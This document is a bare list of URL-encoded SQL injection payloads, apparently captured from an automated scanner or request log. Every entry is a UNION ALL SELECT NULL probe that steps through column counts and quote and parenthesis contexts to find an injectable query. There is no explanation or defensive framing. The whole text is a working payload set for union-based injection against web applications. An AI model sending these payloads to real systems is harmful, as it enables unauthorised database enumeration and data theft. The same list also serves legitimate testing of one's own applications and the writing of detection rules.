1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%202524%3D2524%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203099%3D3099%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%202778%3D2778%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%209364%3D9364%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%202821%3D2821%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%202227%3D2227%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%204566%3D4566%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%202292%3D2292%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%202127%3D2127%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%209967%3D9967%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%202310%3D2310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%204559%3D4559%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%204285%3D4285%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%209039%3D9039%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%203863%3D3863%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%203513%3D3513%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%203415%3D3415%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%205187%3D5187%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%209157%3D9157%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%202162%3D2162%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 